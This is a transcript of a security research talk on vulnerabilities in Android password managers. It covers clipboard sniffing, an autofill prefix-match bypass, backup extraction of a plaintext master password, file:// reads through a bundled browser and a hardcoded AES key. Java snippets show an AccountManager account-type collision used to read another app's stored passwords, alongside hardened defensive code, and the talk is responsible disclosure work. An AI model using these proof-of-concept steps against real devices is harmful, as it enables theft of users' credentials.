Vulnerabilities in Android Password Manager

Extracting All Your Secrets: Vulnerabilities in Android Password Managers
Stephan Huber, Siegfried Rasthofer, Steven Arzt
Fraunhofer SIT
Stephan / Siegfried
• Mobile Security Researcher at Fraunhofer SIT
• Malware and Vulnerability Researcher at Fraunhofer SIT
• Founder of CodeInspect
• Enjoys teaching students in Android (app) hacking
• Web: www.rasthofer.info
• Twitter: @teamsik
Acknowledgements
• Benedikt Hiemenz
• Daniel Hitzel
• Daniel Magin
• Joseph Varghese
• Julien Hachenberger
• Max Kolhagen
• Michael Tröger
• Philipp Roskosch
• Wittmann Andreas
90 Accounts*
*https://thycotic.com
Ways to keep them (diagram): Public Key Crypto, Notebook, Biometric, Pictures, Password Manager, ...
Password Manager
Source: https://www.getkeepsafe.com/about.html
App              Google Play Downloads
Keeper           10 – 50 m
Keepsafe         10 – 50 m
1Password        1 – 5 m
Dashlane         1 – 5 m
Lastpass         1 – 5 m
Avast            0.5 – 1 m
MyPasswords      0.5 – 1 m
F-Secure         100 – 500 k
PasswordManager  50 – 100 k
Password Manager (features)
• Secure Synchronization
• Confidential Password Storage
• Autofill
• Comfort Feature (PIN login)
• Custom Browser
Architecture (diagram, slides 10 to 12): Internet, App, PW-Manager App, PC; the PW-Manager App stores its data in a File (master password), a Database (user1:pw1, user2:pw2, ...) and the Account Manager (master password).
“No-root scenario”
Manual Filling
Automatically Filling
Manual Filling
Diagram: the Password Manager lists the stored entries (user, user1, user2, user3, each with a masked password); an entry is copied to the Clipboard and pasted into the login form at http://twitter.com/login.
Manual Filling - Attack
Diagram: the Password Manager places user:pass on the clipboard, where it is visible to any Receiver App, e.g. a clipboard “sniffer” app (no permissions required), which obtains user:pass.
Automatically Filling
Diagram: the Password Manager holds the entries user, user1, user2, user3 (masked passwords); which entry goes into which app? (?)
Accessibility Services
“An accessibility service is an application that provides user interface enhancements to assist users with disabilities, or who may temporarily be unable to fully interact with a device. For example, users who are driving, taking care of a young child or attending a very loud party might need additional or alternative interface feedback.”
Source: https://developer.android.com
Automatically Filling
Diagram: the Password Manager matches the entry user1 / **** to the Twitter-App (com.twitter.android) and fills it into the app's login fields.
Automatically Filling - Attack
• Attacker app installed under the package name com.twitter.twitterleak
• The password manager derives the reversed domain com.twitter and uses a prefix match: the prefix matches
• It finds the field of input type textPassword and injects the credentials
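How an autofill service can refuse the prefix match shown above: an added example that is not code from the talk or from any of the examined apps. It requires the accessibility node's package name to equal the stored package exactly and additionally compares the APK's signing-certificate hash; the mapping and the hash value are constructed placeholders.

```java
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.content.pm.Signature;
import android.view.accessibility.AccessibilityNodeInfo;
import java.security.MessageDigest;
import java.util.Collections;
import java.util.Map;

/** Decides whether an autofill service may inject credentials into the app behind a node. */
public final class AutofillTargetCheck {
    // Stored entry: full package name -> SHA-256 of its signing certificate.
    // The hash below is a constructed placeholder, not Twitter's real certificate hash.
    private static final Map<String, String> TRUSTED = Collections.singletonMap(
            "com.twitter.android",
            "0000000000000000000000000000000000000000000000000000000000000000");

    // The pattern from the talk: a reversed-domain prefix match, which also accepts
    // com.twitter.twitterleak. Kept only to show what the hardened check replaces.
    static boolean prefixMatch(String pkg) {
        return pkg != null && pkg.startsWith("com.twitter");
    }

    // Hardened check: the package name must match exactly AND the APK must be
    // signed by the certificate recorded for that entry.
    static boolean isTrustedTarget(PackageManager pm, AccessibilityNodeInfo node) throws Exception {
        CharSequence cs = node.getPackageName();
        if (cs == null) return false;
        String expected = TRUSTED.get(cs.toString());      // exact lookup, no prefix logic
        if (expected == null) return false;
        // GET_SIGNATURES is deprecated since API 28 in favour of GET_SIGNING_CERTIFICATES.
        PackageInfo info = pm.getPackageInfo(cs.toString(), PackageManager.GET_SIGNATURES);
        for (Signature sig : info.signatures) {
            if (expected.equalsIgnoreCase(sha256Hex(sig.toByteArray()))) return true;
        }
        return false;                                       // same name, other signer: refuse
    }

    private static String sha256Hex(byte[] data) throws Exception {
        StringBuilder sb = new StringBuilder();
        for (byte b : MessageDigest.getInstance("SHA-256").digest(data)) {
            sb.append(String.format("%02x", b));
        }
        return sb.toString();
    }
}
```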
DEMO TIME!
Diagram (architecture view): PW-Manager App, PC, File (master password), Database (user1:pw1, user2:pw2, ...)
Use Backup Function
adb backup com.fsecure.key
# convert the resulting .ab backup into a tar archive with android-backup-extractor *
tar -xvf mybackup.tar
cat KeyStorage.xml
<string name="master_password">secretpass</string>
* https://github.com/nelenkov/android-backup-extractor
Diagram: the PW Manager uses an API accessing browser elements to fill in credentials.
Password Manager - Custom Browser
Diagram: the Password Manager's built-in Custom Browser opens http://twitter.com/login and autofills the stored entry (user1 / ****) from the list (user, user1, user2, user3); the same browser can also be pointed at the local app folder.
Details about the Browser
• Browser is part of the app
• Running in the same process, part of the sandbox
• Based on WebView API
• Supports file:// URI *
* until Android 6
NOT A COOKIE, CREDENTIALS!
file:///data/data/package.name/shared_prefs/passwords_pref.xml
Attribute name: md5("pincodeValue") *
Attribute value: base64(encr(key, PIN))
* obfuscated attribute values (for this example)
Let's Look into the App Code
public abstract class LPCommon {
    // first part of the key
    protected static String aA = "ldT52Fjsnjdn4390";
    // second part of the key
    protected static String aB = "89y23489h989fFFF";
}
AES-Key: ldT52Fjsnjdn439089y23489h989fFFF
Android AccountManager
• “This class provides access to a centralized registry for the user's online accounts …”
• SQLite database for storing tokens or temporary credentials
• API provides access for applications
/data/system/users/0 # ls -l accounts.db
-rw-rw---- system   system     241664 2017-04-03 10:58 accounts.db
“With this in mind, you shouldn't pass the user's actual password to
AccountManager.addAccountExplicitly(). Instead, you should
store a cryptographically secure token that would be of limited use to an attacker.
If your user credentials are protecting something valuable, you should carefully
consider doing something similar.”
Quote from the Google developer documentation (AccountManager)
https://developer.android.com/training/id-auth/custom_auth.html
DEMO TIME!
Diagram sequence (slides 38 to 44): the System AccountManager keeps accounts.db. The Target App com.dashlane (UID:123) stores email:passwd under its account type. An Attacker App (UID:456) registers the same account type com.dashlane with its own entry mail1:pass1: COLLISION! The attacker app can then Read Account Data and obtains email:passwd.
Icon source: https://thenounproject.com/term/grab/121228/
Writing into AccountManager
try {
    Account account = new Account("[email protected] ", "com.dashlane");
    AccountManager acmanager = AccountManager.get(getApplicationContext());
    // requires permission android.permission.AUTHENTICATE_ACCOUNTS
    acmanager.addAccountExplicitly(account, "DUMMY", null);
} catch (Exception e) {
    Log.e(TAG, "Acc Exception " + e.getMessage()); // catch collision
}

Reading from AccountManager
try {
    AccountManager acmgr = AccountManager.get(getApplicationContext());
    Account[] accounts = acmgr.getAccountsByType("com.dashlane");
    for (Account a : accounts) {
        String password = AccountManager.get(getApplicationContext()).getPassword(a);
        …
    }
} catch (Exception e) {
    e.printStackTrace();
}
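The usage the quoted Google guidance asks for, as an added example that is not code from the talk or from any of the apps it examines: the account is registered with a null password, so accounts.db only ever holds a revocable session token, and a test build can check that nothing is readable back through getPassword(). The account type, token type and the caller's own authenticator are assumptions of this example.

```java
import android.accounts.Account;
import android.accounts.AccountManager;
import android.content.Context;

/** Registers an account without handing the user's real password to AccountManager. */
public final class TokenOnlyAccount {
    // Constructed example values; a real app uses its own authenticator's account type.
    static final String ACCOUNT_TYPE = "com.example.pwmanager";
    static final String TOKEN_TYPE = "session";

    /**
     * Called by the app that owns the authenticator for ACCOUNT_TYPE.
     * The password argument of addAccountExplicitly is null, so accounts.db never
     * holds the login or master password; only a short-lived session token is stored.
     */
    static Account register(Context ctx, String user, String sessionToken) {
        AccountManager am = AccountManager.get(ctx);
        Account account = new Account(user, ACCOUNT_TYPE);
        // Returns false if the account already exists; the token is refreshed either way.
        am.addAccountExplicitly(account, null, null);
        am.setAuthToken(account, TOKEN_TYPE, sessionToken);
        return account;
    }

    /** Self-check for a test build: nothing password-like must be readable back. */
    static boolean storesNoPassword(Context ctx, Account account) {
        return AccountManager.get(ctx).getPassword(account) == null;
    }

    /** On logout or suspected compromise, drop the cached token; server-side revocation is separate. */
    static void revoke(Context ctx, String sessionToken) {
        AccountManager.get(ctx).invalidateAuthToken(ACCOUNT_TYPE, sessionToken);
    }
}
```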
Further Fails
• Custom crypto algorithm
• AES in ECB mode for database encryption
• Bundled browser does not consider subdomains when matching form fields
• Data leakage in browser
• Custom transport security
Improvements
• Use Android KeyStore (AES keys supported since Android 6)
• Use a key derivation function (e.g. the PBKDF2 API, Facebook Conceal)
• NO hardcoded keys
• Use AES/CBC or AES/GCM
• Do not abuse AccountManager
Results table (the per-app marks are not recoverable from this copy): rows are the finding classes Master/PIN, Hardcoded Key, Sandbox Bypass, Side channel, Subdomain, Data leakage, Partial encryption and Broken sync.; columns are the apps Keeper, MyPass, Avast, F-Sec, Keeps., PwMgr, Dash, Lastp and 1Pass.
Full results: www.sit4.me/pw-manager
Summary
• We showed several non-root attacks on Android password managers
• Convenience functions weaken or destroy security
• All findings were reported and fixed
Stephan Huber
Email: [email protected]
Dr. Siegfried Rasthofer
Email: [email protected]
Twitter: @teamsik
Website: www.team-sik.org